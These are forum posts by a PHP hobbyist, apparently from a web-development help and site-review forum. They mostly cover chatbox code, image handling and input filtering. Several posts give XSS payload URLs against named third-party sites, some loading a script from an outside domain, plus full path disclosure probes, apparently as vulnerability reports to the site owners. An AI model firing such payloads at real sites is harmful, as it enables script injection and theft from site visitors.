helraizer

Full path disclosure http://two.team-who.co.uk/CaptchaSecurityImages.php?width=1p

With the $_GET for page. use $page = htmlspecialchars($_GET['page']); //use your variables there. Which will change < and > to < and > which means that the XSS will not work. also do if(is_numeric($post) { //code to display page of that number, either 1 or 2 in your case } else { //code here to give error message to user - if page is not numeric. This will be if it is text or if it is an array. } Hope that helps, Sam

Array http://www.bjjnews.org/TUF/index.php?page[] XSS http://www.bjjnews.org/TUF/index.php?page=2%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E

If you have your email openly on your site, unprotected (with @ and . rather than [at] and [dot] or similar) then it could well be a spam bot, else it could well be some one just testing it. Sam

If you have say $user = $_GET['user']; then instead use $user = htmlspecialchcars($_GET['user']); - That'll change < or > into < or > thus rendering xss obsolete. Sam

http://clients.futuresolutions.com/fsi/usr/login http://clients.futuresolutions.com/fsi/content/page/services%22%3E http://clients.futuresolutions.com/fsi/content/user/login

An annoyance, more than a problem, is that during registration you ask for the user's country twice, and yet still ask for zip code. England for one doesn't use Zip codes. so how can they possibly be verified? I've registered now, it may take up to 24 to activate my account, if they'll activate it, that is. Sam

XSS - http://iupgbsa.info/profile.php?user=%22%3E%3Cmarquee%3E%3Ch1%3Evunerable%3C/h1%3E%3C/marquee%3E http://iupgbsa.info/profile.php?user=15%22%3E%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E - need to protect GET variables. http://iupgbsa.info/profile.php?user=15 Just to name a few

this code: <?php $img = imagecreate(150,35); $black = imagecolorallocate($img, 0,0,0); imageFill($img, 0, 0, $black); $im = imagecreatefrompng("14t0kxy.png"); $white = imagecolorallocate($im, 255,255,255); $trans_white = imagecolortransparent($im, $white); imagecopymerge($img, $im, 0,0,0,0,150,35,100); header("Content-type: image/png"); imagepng($img); imagepng($img, "image.png"); imagedestroy($img); imagedestroy($img); ?> produces this: Slight oddity with the pink text but you get the idea. Sam

If you want the white colour transparent you'd do this: $im = imagecreatefrompng("images/" . $goals[$goal]); // create image $white = imagecolorallocate($im, 255,255,255); //define a colour $trans_white = imagecolortransparent($im, $white); // define the colour as transparent. then to your last question: look up imagecopymerge, that allows you to insert one image ontop of another, at varying levels of transparency (0 being invisible, 50 being faded in, 100 being the exact image on the main image. Hope that helps. Sam

The normal look: The broken look:

Say you had a database with all users in it, you'd have username, name, surname, title etc.. you'd also have an age column. Then pull from the database the age from the person doing the adding (user1) and that of the person being added (user2). So something like if($user1_age>18 && $user2_age<18) { echo "You can't add a user under 18 for legal reasons!"; } Something like that. Although, you might want to refine your ages.. at the moment a 19 year old can't add a 17 year old. That's not anything dodgy at all. and it limits people. this if($user1_age>25 && $user2_age<16) { echo "You can't add a user under 16 for legal reasons!"; } would probably be better. Sam

Hi folks, I have a file for my chatbox called data.line, which the posts are in the layout CHATBOXTEXT 7 username=helraizer 1202416953 ip=86.140.73.183 color=yellow font=palab message=bit of a bug, I admit ### username=Helraizer 1202420235 ip=86.140.73.183 color=yellow font=palab message=Teeeeeeesting ### username=Fjar 1202420306 ip=81.77.39.76 color=yellow font=palab message=I love you, my Sam ### username=helraizer 1202420637 ip=81.77.39.76 color=aqua font=palab message=I love you too, my Fjar!! <3 ### This is fine, when you post a comment it posts your data like this from a form using this code index.php (only relavent code shown) <?php $text = htmlspecialchars(stripcslashes($_POST['input'] . "\n")); $username = htmlspecialchars(stripslashes($_POST['username'])); $color = $_POST['color']; $font = $_POST['font']; $ip = $_SERVER['REMOTE_ADDR'] . "\n"; $ip1 = mysql_real_escape_string($_SERVER['REMOTE_ADDR']); $_SESSION['username'] = $username; $_SESSION['color'] = $color; $current_time = mysql_real_escape_string(time()); $data[] = "\n".trim("\nusername=".htmlspecialchars_decode(substr($username, 0, 10)) . "\r"); $data[] = trim($current_time) . "\r"; $data[] = "ip=".trim($ip1) . "\r"; $data[] = "color=".trim($color) . "\r"; $data[] = "font=".trim($font) . "\r"; $data[] = "message=".htmlspecialchars_decode(trim(substr($text, 0, 75)) . "\r"); $data[] = trim("###"); //followed by later $datal = file_get_contents("data.line"); if (stristr($datal, $_SERVER['REMOTE_ADDR'])) { echo "<a href='http://helraizer.dnsalias.net/Chat/index.php5?action=delete'><b>Delete your post</b></a>"; $_SESSION['a'] = 1; if (isset($_SESSION['a']) && $_GET['action']=="delete") { ?><table align='center'><tr><td><b>Post Deletion</b></td></tr><tr><td> <?php $us_name = $_POST['user']; echo "<form align='center' name='post' action='delete.php5' method='post'>"; echo "<label align='center' for='user'>Please enter the username you used in your post:</label>"; echo " <input type='text' align='center' id='usera' name='usera' size='10' maxlength='10'>"; echo " <input type='submit' value='Delete!' name='submita' id='submita'>"; ?> </form></td></tr></table><br><br><br> <?php } } ?> Which is fine. It adds the new post after the previous, starting on a new line each time. It must do this or the script won't read be able to read the file at all, or will pull the wrong information out and thus break the formatting. function.php <?php function ddfm_flock($handle, $param) { global $enable_file_locking; if ($enable_file_locking == TRUE) { return flock($handle, $param); } else { return TRUE; } ?> } Then in finally in delete.php <?php if (isset($_POST['submita'])) { $entries = file_get_contents("data.line"); $entries = (array )explode('###', $entries); foreach ($entries as $entry) { $data_t = explode("\r", trim($entry)); if ($data_t[0] == "username=" . $_POST['usera']) { $data = array(); foreach ($data_t as $dt) { if (strpos($dt, '=') != false) { $k = substr($dt, 0, strpos($dt, '=')); $v = substr($dt, strpos($dt, '=') + 1, strlen($dt) - strpos($dt, '=')); $data[$k] = $v; } } $data['timestamp'] = $data_t[1]; if (isset($_POST['usera'])) { if (is_string($_POST['usera'])) { $item = "username=" . $_POST['usera']; } } $the_ip = ""; $entries = file_get_contents("data.line"); $entries = (array )explode('###', $entries); foreach ($entries as $entry) { $data_t = explode("\r", trim($entry)); if (trim($data_t[0]) == $item) { foreach ($data_t as $d) { if (strpos($d, 'username=') === 0) { $the_ip = substr($d, 9, strlen($d) - 1); } } } } $entries = file_get_contents("data.line"); $entries = (array )explode('###', $entries); // recreate file $handle = fopen("data.line", "w"); if (ddfm_flock($handle, LOCK_EX)) { // do an exclusive lock foreach ($entries as $entry) { $data_t = explode("\r", trim($entry)); if (trim($data_t[0]) != "") { // if valid item foreach ($data_t as $d) { if (strpos($d, 'username=') === 0) { $test_ip = substr($d, 9, strlen($d) - 1); } } if ($test_ip != $the_ip) { // put back foreach ($data_t as $d) { fwrite($handle, $d . "\r"); } fwrite($handle, "###\r"); } else { // skip items from this IP } } } ddfm_flock($handle, LOCK_UN); // release the lock } else { } } } ?> which adds a blank line to the chatbox and thus the chatbox returns the wrong values and format.. How would I stop it from adding this extra line? If I change fwrite($handle, "###\r") to fwrite($handle, "###") it makes data.line format as: CHATBOXTEXT 7 username=helraizer 1202416953 ip=86.140.73.183 color=yellow font=palab message=bit of a bug, I admit ###username=Fjar 1202420306 ip=81.77.39.76 color=yellow font=palab message=I love you, my Sam ###username=helraizer 1202420637 ip=81.77.39.76 color=aqua font=palab message=I love you too, my Fjar!! <3 ### The username of the next post starts on the same lines as the ### and the same problem occurs Instead of reading [helraizer]bit of a bug, I admit (should be yellow) [Fjar] I love you my Sam!! (should be yellow) [helraizer]I love you too, my Fjar!! <3 (should be blue) it reads [palab]palab [202416953][202420306] helraizer ^all of them white (the default if $color is not specified or different to those it is supposed to be). How would I get it to, when I delete a post, print the comment (all information) starting on the line after the previous ###? Hope that makes sense. Just ask if you need more information. Thanks, Sam

I suppose if the time is counted in seconds then with a typo 600 could easily become 60, could be as simple as that..

Hi folks, In my script I have this code: <?php unset($errors); include ("linesfile.php5"); $filename = "data.line"; set_magic_quotes_runtime(0); if ($_POST['submit'] && strlen($_POST['input']) < 5) { $errors[] .= _NO_5; } if ($_POST['submit'] && strlen($_POST['username']) < 3) { $errors[] .= _NO_2; } $dirty = array('rude word', 'another rude word', 'etc'); foreach($dirty AS $bad_word){ if(preg_match("/$bad_word/i", $_POST['input'])) $errors[]= 'The word you entered, "'.$bad_word.'", has been detected as being offensive; your post has not been submitted. Sorry for any inconvenience.'; } ?> <div class="ddgb_entrybox"> <table width="100%" border="0" cellspacing="8" cellpadding="0"> <tr> <td width="42%" align="center" valign="top"></td> <td align="left" valign="top"> <?php if (isset($_POST['submit']) && $errors[0] != null) { echo "<h2>" . _ERROR . "</h2><ul>"; foreach ($errors as $f) { echo "<li>" . $f . "</li>"; } echo "</ul>"; } elseif ($_POST['submit']) { // grab the inputted text $text = htmlspecialchars(stripcslashes($_POST['input'] . "\n")); $username = htmlspecialchars(stripslashes($_POST['username'])); $color = $_POST['color']; $font = $_POST['font']; $ip = $_SERVER['REMOTE_ADDR'] . "\n"; $ip1 = $_SERVER['REMOTE_ADDR']; $time = time(); $_SESSION['username'] = $username; $_SESSION['color'] = $color; $data[] = "\n" . htmlspecialchars_decode(substr($username, 0, 10)); $data[] = trim($color); $data[] = trim($font); $data[] = htmlspecialchars_decode(trim(substr($text, 0, 75))); //Process the post $datafile = new DataFile($filename); if (!$datafile->writeNewLine($data)) die("Error writing to file"); } ?> I have a database set up called `chatbox` with a table `post` having the fields 'time' and 'ip'. The idea: when the user posts, their ip is stored in the database along with the time stamp from when they post using $sql = "INSERT INTO `chatbox`.`post` (`time`, `ip`) VALUES ('$time, $ip)"; //$time being merely time() and $ip being $_SERVER['REMOTE_ADDR']; $result = mysql_query($sql) or die('Error in SQL: ".mysql_error()); I was planning to then query the database to see whether that ip (user) posted within the last 30 seconds ( if($row['time'] < ($time + 30)) { } ) if they have then $errors[] = 'You have already posted once, please wait 30 seconds to post again'; if not then it will post the form. I have the code to use but how would I impliment this into my code? Thanks, Sam

Thanks guys, it works perfectly now. Sam

Hi Folks, I have a filtering system to clean up user input in the respect of swearing. The code I have at the moment is this: <?php $dirty = array('rude word', 'another', 'and another rude word', 'another, please Carol'); foreach($dirty AS $bad_word){ $text = preg_replace("/$bad_word/i","****", $text); } ?> So if the user inputted 'rude word me, it works!!!' and then 'and another rude word you' it'd turn into '**** me, it works!!!' and '**** you'. Which makes it look odd, so instead of the preg_replace I was thinking of throwing an error message (which I also have using $errors as an array). <?php define('_SWEAR', 'The word you entered, "'.$word.'", has been detected as being offensive; your post has not been submitted. Sorry for any inconvenience.'); //for the error. ?> How would I get it so that $word is the value in the $dirty array that the user inputted so it'd read: Error! - The word you entered, "rude word", has been detected as being offensive; your post has not been submitted. Sorry for any inconvenience. Otherwise it'd just pull out any if not all of the elements of the array. How would I do this? Thanks, Sam

Thanks for the response. On the site layout or the chatbox? If the site: I think I will make the '.: Page Name :.' part white so they fit with the black better than the blue/purple does. Well, with the silver and blue banner at the top, with silver links I thought black would work the best with those colours. If it were white, say, the silver and blue wouldn't has such an impact. Any ideas of improvement? Sam

Some people have tried to break it, so I now have implimented new systems. The username cannot be less than 3 characters nor longer than 10, the comment can only be between 5 and 75 characters. If someone makes their own form to submit values, and the colour and/or font are different to those in the list on my site, it will be returned as a default colour and/or font. All comments and username are truncated to 75 and 10 characters (respectively). Can anyone suggest any improvements? Sam (http://www.helraizer.co.uk/mychatbox)

phpDesigner 2007 better not be free, I payed for a liscense but I agree with you, it is probably the best. Would it be worth looking at getting 2008?

About SESSION he means like $_SESSION['s'] = 1000 That way no one can edit it and thus no one can cheat.

Not sure about everyone else but we should have a little more time to edit a post. Currently if you make a post you have less than a minute to spot an error and change it (literally 60 seconds). This also means that if we can't edit it the post after a certain time then we have to make a new post in order to show changes to the original post. Maybe it's just me, though, who thinks it should be slightly longer, maybe 3 - 5 minutes? What does everyone else think? Sam

Hi folks, I have this site and idea http://www.helraizer.co.uk/mychatbox/ at the moment I'm using javascript to alert the user if they haven't entered a username or message but all this does is popup an alert message and return false. However, if their browser does not support javascript (javascript is turned off) then it just won't send and will give them no reason why. How would I get it so that, using php, if the submit button is pressed and either the username is less than 3 characters and/or the comment field is less than 5 characters then above the image (on the site page) a list of errors would appear. So if nothing was wrong it shows no errors but if the user name was less than 3 characters and comment <5 it'd appear "Error! -Your username is too short, please enter a user name between 3 and 10 characters. -Your comment is too short, please enter a comment between 5 and 75 characters." (or similar) How would I do this? I know this is a "help" forum not a "do it for me forum" but if you guys can give me a baseline for this problem, to work with from there I can probably get it from there. Thanks, Sam

Oh bugger. That would help.. wouldn't it.. http://www.helraizer.co.uk/mychatbox/ Sorry about that. Sam

Hi folks, I have been working on this for a while, could you tell me what you think? The idea behind it is that it can be used as a forum signature, soon I will make a user system so people can have their own chatbox to use. So instead of Helraizer's Chatbox it'll have Username's chatbox (Username being their chosen username) but that's for later. How could either the chatbox or the website itself be improved/look better? Thanks, Sam